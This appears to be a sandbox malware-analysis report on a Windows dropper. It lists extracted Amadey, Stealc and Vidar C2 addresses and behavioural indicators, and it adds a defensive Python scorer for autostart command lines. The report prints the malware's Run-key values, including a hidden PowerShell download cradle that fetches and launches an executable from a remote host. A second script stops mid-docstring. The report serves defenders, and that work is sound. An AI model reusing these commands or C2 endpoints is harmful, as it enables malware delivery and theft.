Analysis
max time kernel: 150s
max time network: 155s
platform: windows10-2004_x64
resource: win10v2004-20250314-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
submitted: 24/03/2025, 09:01

Static task: static1

Behavioral task: behavioral1
Sample: 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
Resource: win7-20241010-en

Behavioral task: behavioral2
Sample: 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
Resource: win10v2004-20250314-en

The memory-dump and file YARA hits listed under Signatures are tagged behavioral2, i.e. they come from the Windows 10 run described by the platform and resource fields above.
General
Target: 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
Size: 938KB
MD5: 278fa6cdc2189c33b3cf59614d6d9e7f
SHA1: f382716bf5dc31ee6cdac0a1f9890a5164d0c18e
SHA256: 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a
SHA512: 76cdd7a6b9e45ae8413f60e0369d045bfd1bfc3e879e0fac54c1303d312813380dc8907aeaf5e6525b47aa9c3768bac99c58fd1f7a2a38f5f193b5d55ebbf9c6
SSDEEP: 24576:eqDEvCTbMWu7rQYlBQcBiT6rprG8a0uu:eTvC/MTQYxsWR7a0u
Malware Config

Extracted (three identical configurations)
URL: http://176.113.115.7/mine/random.exe

Extracted: amadey
version: 5.21
botnet: 092155
C2: http://176.113.115.6
install_dir: bb556cff4a
install_file: rapes.exe
strings_key: a131b127e996a898cd19ffb2d92e481b
url_paths: /Ni9kiput/index.php
(install_file matches the dropped rapes.exe and the C:\Windows\Tasks\rapes.job scheduled task recorded under Signatures.)

Extracted: stealc
botnet: trump
C2: http://45.93.20.28
url_path: /85a1cacf11314eb8.php
Signatures

Amadey family

Detect Vidar Stealer 2 IoCs
resource | yara_rule
behavioral2/memory/6024-709-0x0000000000400000-0x0000000000867000-memory.dmp | family_vidar_v7
behavioral2/memory/6024-20974-0x0000000000400000-0x0000000000867000-memory.dmp | family_vidar_v7
(PID 6024 is advnrNo.exe; see "Executes dropped EXE".)

Detects Healer, an antivirus disabler dropper 2 IoCs
resource | yara_rule
behavioral2/memory/7160-53360-0x00000000007F0000-0x0000000000C32000-memory.dmp | healer
behavioral2/memory/7160-53361-0x00000000007F0000-0x0000000000C32000-memory.dmp | healer

Healer family

Modifies security service 2 TTPs 2 IoCs
description | ioc | Process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security | reg.exe
(wscsvc is the Windows Security Center service; deleting its Parameters and Security subkeys breaks the service rather than merely disabling it.)

Stealc family

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description | pid | Process | procid_target
PID 1836 created 2580 | 1836 | Organizations.com | 42

Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 483d2fa8a0d53818306efeb32d3.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rapes.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | advnrNo.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rapes.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE

Blocklisted process makes network request 3 IoCs
flow | pid | Process
22 | 4584 | powershell.exe
338 | 7312 | powershell.exe
420 | 9460 | powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Runs PowerShell with its display window hidden.
pid | Process
4584 | powershell.exe
7312 | powershell.exe
9460 | powershell.exe
4728 | powershell.exe
11152 | powershell.exe
8288 | powershell.exe
8708 | powershell.exe
9028 | powershell.exe

Creates new service(s) 2 TTPs

Downloads MZ/PE file 14 IoCs
flow | pid | Process
88 | 804 | svchost.exe
134 | 4304 | rapes.exe
568 | 10964 | svchost.exe
65 | 4304 | rapes.exe
538 | 4304 | rapes.exe
30 | 4304 | rapes.exe
30 | 4304 | rapes.exe
223 | 4304 | rapes.exe
223 | 4304 | rapes.exe
223 | 4304 | rapes.exe
22 | 4584 | powershell.exe
107 | 4304 | rapes.exe
338 | 7312 | powershell.exe
420 | 9460 | powershell.exe

Drops file in Drivers directory 3 IoCs
description | ioc | Process
File created | C:\Windows\System32\Drivers\b5e51aa1.sys | d91c7611.exe
File created | C:\Windows\System32\Drivers\klupd_b5e51aa1a_arkmon.sys | d91c7611.exe
File created | C:\Windows\System32\Drivers\klupd_b5e51aa1a_klbg.sys | d91c7611.exe

Possible privilege escalation attempt 2 IoCs
pid | Process
4688 | takeown.exe
4904 | icacls.exe

Sets service image path in registry 2 TTPs 7 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\V60vTp_2040\ImagePath = "\\??\\C:\\Windows\\Temp\\T076SXg_2040.sys" | tzutil.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\b5e51aa1\ImagePath = "System32\\Drivers\\b5e51aa1.sys" | d91c7611.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b5e51aa1a_arkmon\ImagePath = "System32\\Drivers\\klupd_b5e51aa1a_arkmon.sys" | d91c7611.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b5e51aa1a_klbg\ImagePath = "System32\\Drivers\\klupd_b5e51aa1a_klbg.sys" | d91c7611.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b5e51aa1a_klark\ImagePath = "System32\\Drivers\\klupd_b5e51aa1a_klark.sys" | d91c7611.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b5e51aa1a_mark\ImagePath = "System32\\Drivers\\klupd_b5e51aa1a_mark.sys" | d91c7611.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b5e51aa1a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_b5e51aa1a_arkmon.sys" | d91c7611.exe
Two things to note here. tzutil.exe is not the system time-zone utility: PID 2040 is listed under "Executes dropped EXE", and both the service name V60vTp_2040 and the driver T076SXg_2040.sys embed that PID, so the name is borrowed. The klupd_* driver names and the C:\KVRT2020_Data\ path written by d91c7611.exe (PID 12132) match the on-disk layout of the Kaspersky Virus Removal Tool; the same process is behind the SafeBoot entries, the PhysicalDrive0 open and the 26 DLL loads further down, so treat those signatures as one component's activity rather than several.

Stops running service(s) 4 TTPs
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used to control the browser and steal sensitive information such as credentials and session cookies.
pid | Process
380 | chrome.exe
640 | chrome.exe
5180 | chrome.exe
4884 | chrome.exe
5608 | chrome.exe
13012 | msedge.exe
6420 | msedge.exe
6412 | msedge.exe

Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | advnrNo.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | advnrNo.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 483d2fa8a0d53818306efeb32d3.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 483d2fa8a0d53818306efeb32d3.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rapes.exe

Checks computer location settings 2 TTPs 10 IoCs
Looks up the country code configured in the registry, likely a geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | mshta.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | apple.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | 11.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | 11.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | advnrNo.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | mshta.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | mshta.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE
Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | rapes.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | zx4PJh6.exe

Deletes itself 1 IoCs
pid | Process
1088 | w32tm.exe

Executes dropped EXE 22 IoCs
pid | Process
1580 | Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE
4304 | rapes.exe
2536 | zx4PJh6.exe
1836 | Organizations.com
6024 | advnrNo.exe
824 | OkH8IPF.exe
672 | y0u3d_003.exe
4976 | tK0oYx3.exe
2040 | tzutil.exe
1088 | w32tm.exe
1236 | rapes.exe
7824 | apple.exe
7968 | 11.exe
3356 | 11.exe
11192 | 3ff3734d.exe
12132 | d91c7611.exe
9624 | Jq0hGDZ.exe
3228 | 32ae679328.exe
8072 | TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE
9880 | 483d2fa8a0d53818306efeb32d3.exe
10460 | QL4t9UZ.exe
10824 | laf6w_001.exe
(w32tm.exe, tzutil.exe and Organizations.com in this list are dropped files that borrow system-utility or benign-looking names; do not match them against the real binaries in System32 by name alone.)
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine | advnrNo.exe
Key opened | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine | rapes.exe
Key opened | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine | TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE
Key opened | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine | 483d2fa8a0d53818306efeb32d3.exe
Key opened | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine | Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE
Key opened | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine | rapes.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b5e51aa1.sys | d91c7611.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b5e51aa1.sys\ = "Driver" | d91c7611.exe
(This registers the b5e51aa1.sys driver dropped above so that it also loads in Safe Mode.)

Loads dropped DLL 26 IoCs
pid | Process
12132 | d91c7611.exe (all 26 loads)

Modifies file permissions 1 TTPs 2 IoCs
pid | Process
4904 | icacls.exe
4688 | takeown.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Unsecured Credentials: Credentials In Files 1 TTPs
Steals credentials from unsecured files.

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 10 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" | svchost.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" | svchost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Service 470 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\10317340101\\Jq0hGDZ.exe\"" | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\32ae679328.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10318740101\\32ae679328.exe" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdate = "cmd /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"Start-Sleep -s 30; Start-Process 'C:\\Users\\Admin\\AppData\\Roaming\\win_init.exe' -WindowStyle Hidden\"" | QL4t9UZ.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\df513079-9927-45c9-969d-fda124fb67ed = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{007ffd04-f795-4b5a-bf8e-373bfffa4394}\\df513079-9927-45c9-969d-fda124fb67ed.cmd\"" | d91c7611.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10318750121\\am_no.cmd" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate = "cmd /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\\Users\\Admin\\AppData\\Roaming\\win_init.exe'\"" | QL4t9UZ.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {7621FABD-8E1C-4682-ACCD-F95D288F67B3}" | svchost.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {7621FABD-8E1C-4682-ACCD-F95D288F67B3}" | svchost.exe
(Values are shown with the report's backslash and quote escaping; the two QL4t9UZ.exe entries form one chain: WinUpdate downloads win_init.exe from a GitHub release into AppData\Roaming, SystemUpdate starts it 30 seconds after each logon.)
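The two QL4t9UZ.exe Run values above are the persistence pattern worth hunting for on other hosts: a hidden, policy-bypassing PowerShell launched through cmd.exe, a download cradle into a user-writable directory, and a delayed start. The following is an added example, not code from the sandbox, the report or the malware, that scores Run-value command lines for those traits and for the --remote-debugging-port launch that sits behind the "Uses browser remote debugging" signature earlier on this page. The two report values are embedded in unescaped form; the OneDrive and chrome.exe entries, the indicator names, the weights and the threshold are this example's own assumptions.

```python
"""Score autostart command lines for the living-off-the-land patterns this
report flags.  Added example; the report values are reproduced unescaped,
everything else (indicator set, weights, the OneDrive and chrome.exe
entries) is constructed for the example."""
import re
from dataclasses import dataclass, field

# (tag, regex applied to the lower-cased command line, weight).  Weights and
# the threshold are this example's choice, not a published scoring scheme.
INDICATORS = [
    ("nested_interpreter",       r"\bcmd(?:\.exe)?\s+/c\b.*\bpowershell", 1),
    ("minimized_start",          r"\bstart\s+/min\b", 1),
    ("hidden_window",            r"-w[a-z]*\s+h(?:idden)?\b", 2),      # -WindowStyle Hidden, -w h
    ("policy_bypass",            r"-e[a-z]*\s+bypass\b", 2),           # -ExecutionPolicy / -ep Bypass
    ("encoded_command",          r"-e(?:nc[a-z]*|c)?\s+[a-z0-9+/]{20,}={0,2}", 2),
    ("download_cradle",          r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|"
                                 r"downloadstring|downloadfile|start-bitstransfer|certutil\b.*urlcache", 3),
    ("delayed_start",            r"start-sleep|\btimeout\s+/t\b|\bping\b.*-n\s+\d+", 1),
    ("user_writable_path",       r"\\appdata\\(?:roaming|local)\\|\\users\\public\\|\\programdata\\", 1),
    ("browser_remote_debugging", r"--remote-debugging-(?:port|pipe)\b", 4),
]
COMPILED = [(tag, re.compile(rx), weight) for tag, rx, weight in INDICATORS]
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
SUSPICIOUS_AT = 4


@dataclass
class Finding:
    cmdline: str
    tags: list = field(default_factory=list)
    score: int = 0
    urls: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        if self.score >= SUSPICIOUS_AT:
            return "suspicious"
        return "review" if self.score else "clean"


def classify(cmdline: str) -> Finding:
    """Tag one command line.  Matching is case-insensitive; URLs are pulled
    from the original string so their case survives for blocking."""
    low = cmdline.lower()
    finding = Finding(cmdline=cmdline, urls=URL_RE.findall(cmdline))
    for tag, rx, weight in COMPILED:
        if rx.search(low):
            finding.tags.append(tag)
            finding.score += weight
    return finding


def triage_run_values(values: dict) -> list:
    """Classify every (value name -> data) pair, highest score first."""
    results = [(name, classify(data)) for name, data in values.items()]
    results.sort(key=lambda item: item[1].score, reverse=True)
    return results


SAMPLE_RUN_VALUES = {
    # From the report (HKCU\...\Run, written by QL4t9UZ.exe), unescaped:
    "WinUpdate": r'''cmd /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\win_init.exe'"''',
    "SystemUpdate": r'''cmd /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\Admin\AppData\Roaming\win_init.exe' -WindowStyle Hidden"''',
    # Constructed entries (not from the report): a benign autostart and a
    # browser launched with remote debugging enabled.
    "OneDrive": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background',
    "ChromeDebug": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless --disable-gpu',
}

if __name__ == "__main__":
    for name, finding in triage_run_values(SAMPLE_RUN_VALUES):
        print(f"{finding.verdict:10} {finding.score:2}  {name}: {', '.join(finding.tags) or '-'}")
        for url in finding.urls:
            print(f"              url: {url}")
```

On a live host the input dict comes from enumerating the Run and RunOnce keys under HKLM and every loaded HKU hive; the same classifier applies unchanged to scheduled-task actions and service ImagePath values, which is where the rest of this report's persistence lives.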
Checks for any installed AV software in registry 1 TTPs 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\KasperskyLab | d91c7611.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\F: | d91c7611.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow | ioc
517 | pastebin.com
519 | pastebin.com

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description | ioc | Process
File opened for modification | \??\PhysicalDrive0 | d91c7611.exe

AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral2/files/0x000800000002422a-21360.dat | autoit_exe
behavioral2/files/0x000300000002197d-53296.dat | autoit_exe

Enumerates processes with tasklist 1 TTPs 6 IoCs
pid | Process
10936 | tasklist.exe
13644 | tasklist.exe
1780 | tasklist.exe
1656 | tasklist.exe
10548 | tasklist.exe
10824 | tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid | Process
1580 | Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE
4304 | rapes.exe
6024 | advnrNo.exe
1236 | rapes.exe
8072 | TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE
9880 | 483d2fa8a0d53818306efeb32d3.exe

Suspicious use of SetThreadContext 2 IoCs
description | pid | Process | procid_target
PID 824 set thread context of 4584 | 824 | OkH8IPF.exe | 131
PID 4976 set thread context of 4688 | 4976 | tK0oYx3.exe | 166
(4584 is one of the hidden powershell.exe instances and 4688 is takeown.exe in the lists above: each dropper spawned a signed Windows binary and rewrote its thread context, which is consistent with process hollowing rather than a normal launch.)

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description | ioc | Process
File opened (read-only) | \??\VBoxMiniRdrDN | 3ff3734d.exe
File opened (read-only) | \??\VBoxMiniRdrDN | d91c7611.exe
Drops file in Program Files directory 64 IoCs
description | ioc | Process
All 64 entries are "File opened for modification" by cmd.exe, and every path is a Windows Defender language-resource file:
C:\Program Files\Windows Defender\<locale>\ for de-DE, es-ES, fr-FR and ja-JP: EppManifest.dll.mui, MpAsDesc.dll.mui, MpEvMsg.dll.mui, MsMpRes.dll.mui, OfflineScannerShell.exe.mui, ProtectionManagement.dll.mui, ProtectionManagement.mfl, ProtectionManagement_Uninstall.mfl, shellext.dll.mui (9 per locale, 36)
C:\Program Files\Windows Defender\it-IT\: the same set without OfflineScannerShell.exe.mui (8)
C:\Program Files\Windows Defender\uk-UA\: the same set without MpEvMsg.dll.mui (8)
C:\Program Files (x86)\Windows Defender\<locale>\ for de-DE, es-ES, fr-FR, it-IT, ja-JP and uk-UA: EppManifest.dll.mui, MpAsDesc.dll.mui (2 per locale, 12)
Read together with the takeown.exe/icacls.exe runs under "Modifies file permissions" and the 38 sc.exe launches, this is consistent with tampering with the Defender installation (take ownership, loosen ACLs, then open the files for write) rather than with a benign update.
Drops file in Windows directory 8 IoCs
description | ioc | Process
File opened for modification | C:\Windows\CylinderPair | zx4PJh6.exe
File created | C:\Windows\Tasks\rapes.job | Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE
File opened for modification | C:\Windows\NecessityInfections | zx4PJh6.exe
File opened for modification | C:\Windows\VancouverPulse | zx4PJh6.exe
File opened for modification | C:\Windows\GuaranteesFear | zx4PJh6.exe
File opened for modification | C:\Windows\InvestingTr | zx4PJh6.exe
File opened for modification | C:\Windows\OfficeForbes | zx4PJh6.exe
File opened for modification | C:\Windows\SheDrum | zx4PJh6.exe

Launches sc.exe 38 IoCs
sc.exe is a Windows utility to control services on the system.
pid | Process
38 sc.exe launches, PIDs: 9168, 9188, 9332, 9900, 8376, 1176, 8944, 9708, 9816, 10132, 9376, 9540, 9932, 10036, 9568, 1944, 8460, 4768, 9684, 5988, 8784, 9084, 9424, 9792, 10000, 10572, 4764, 4216, 4316, 8504, 8712, 8820, 824, 9256, 9456, 10200, 8596, 9040
(PID 824 is reused: it also appears as OkH8IPF.exe under "Executes dropped EXE", so match on PID plus start time, not PID alone.)

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | d91c7611.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | d91c7611.exe

Program crash 1 IoCs
pid | pid_target | Process | procid_target
3592 | 1836 | WerFault.exe | 121
(The crashing process, PID 1836, is Organizations.com.)
System Location Discovery: System Language Discovery 1 TTPs 51 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
All 51 entries are "Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language". Processes, with counts:
cmd.exe (10), CMD.exe (1), powershell.exe (6), findstr.exe (3), mshta.exe (3), schtasks.exe (3), 11.exe (2), MSBuild.exe (2), tasklist.exe (2), timeout.exe (2), and one each for zx4PJh6.exe, 3ff3734d.exe, y0u3d_003.exe, 483d2fa8a0d53818306efeb32d3.exe, apple.exe, rapes.exe, choice.exe, Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE, extrac32.exe, TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE, 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe, Organizations.com, advnrNo.exe, fontdrvhost.exe, 32ae679328.exe, laf6w_001.exe, d91c7611.exe.
This key is opened by ordinary locale lookups, which is why built-in utilities such as cmd.exe, findstr.exe, timeout.exe and fontdrvhost.exe appear here; on its own it is a weak indicator, and the Geo\Nation query above is the better geofence signal.
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | advnrNo.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | advnrNo.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | chrome.exe

Delays execution with timeout.exe 3 IoCs
pid | Process
8428 | timeout.exe
10884 | timeout.exe
6080 | timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
(The readers here are chrome.exe and msedge.exe, the browsers the stealer launched with remote debugging; browsers read CPU and BIOS identity for their own telemetry, so these two hardware-query signatures carry little weight by themselves. The VBOX__ ACPI key, the BIOS version strings, Software\Wine and VBoxMiniRdrDN, which only the dropped executables touch, are the meaningful anti-sandbox checks.)
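The sandbox-detection signatures on this page (VirtualBox ACPI key, BIOS version strings, Software\Wine, VBoxMiniRdrDN, NtSetInformationThread with ThreadHideFromDebugger) only become convincing in aggregate per process, since chrome.exe and msedge.exe also read the CentralProcessor and BIOS keys. The following is an added example, not code from the report or the sample, that folds sandbox-style events into per-process verdicts and keeps plain hardware queries apart from real VM probes. The event list is constructed from rows in this report (advnrNo.exe, rapes.exe, 3ff3734d.exe, chrome.exe); the class names, the strong/weak split and the thresholds are this example's assumptions.

```python
"""Aggregate per-process sandbox/VM-detection indicators from sandbox-style
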